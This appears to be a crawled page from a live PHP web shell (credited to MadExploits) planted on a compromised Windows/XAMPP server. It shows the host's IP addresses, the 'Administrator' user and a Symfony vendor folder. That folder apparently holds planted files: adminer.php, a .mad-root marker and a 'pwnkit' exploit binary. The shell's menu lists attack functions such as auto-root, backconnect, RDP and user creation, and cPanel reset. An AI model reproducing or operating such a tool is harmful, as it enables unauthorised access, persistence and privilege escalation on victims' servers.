Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
symfony /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
Builder
[ DIR ]
drwxrwxrwx
Definition
[ DIR ]
drwxrwxrwx
Exception
[ DIR ]
drwxrwxrwx
Loader
[ DIR ]
drwxrwxrwx
Resource
[ DIR ]
drwxrwxrwx
Util
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
CHANGELOG.md
4.14
KB
-rw-rw-rw-
ConfigCache.php
1.5
KB
-rw-rw-rw-
ConfigCacheFactory.php
1.08
KB
-rw-rw-rw-
ConfigCacheFactoryInterface.ph...
958
B
-rw-rw-rw-
ConfigCacheInterface.php
1.25
KB
-rw-rw-rw-
FileLocator.php
2.48
KB
-rw-rw-rw-
FileLocatorInterface.php
1.03
KB
-rw-rw-rw-
LICENSE
1.04
KB
-rw-rw-rw-
README.md
596
B
-rw-rw-rw-
ResourceCheckerConfigCache.php
5.46
KB
-rw-rw-rw-
ResourceCheckerConfigCacheFact...
1.05
KB
-rw-rw-rw-
ResourceCheckerInterface.php
1.2
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
composer.json
1.32
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ResourceCheckerInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Resource\ResourceInterface; /** * Interface for ResourceCheckers. * * When a ResourceCheckerConfigCache instance is checked for freshness, all its associated * metadata resources are passed to ResourceCheckers. The ResourceCheckers * can then inspect the resources and decide whether the cache can be considered * fresh or not. * * @author Matthias Pigulla <mp@webfactory.de> * @author Benjamin Klotz <bk@webfactory.de> */ interface ResourceCheckerInterface { /** * Queries the ResourceChecker whether it can validate a given * resource or not. * * @return bool */ public function supports(ResourceInterface $metadata); /** * Validates the resource. * * @param int $timestamp The timestamp at which the cache associated with this resource was created * * @return bool */ public function isFresh(ResourceInterface $resource, int $timestamp); }
Close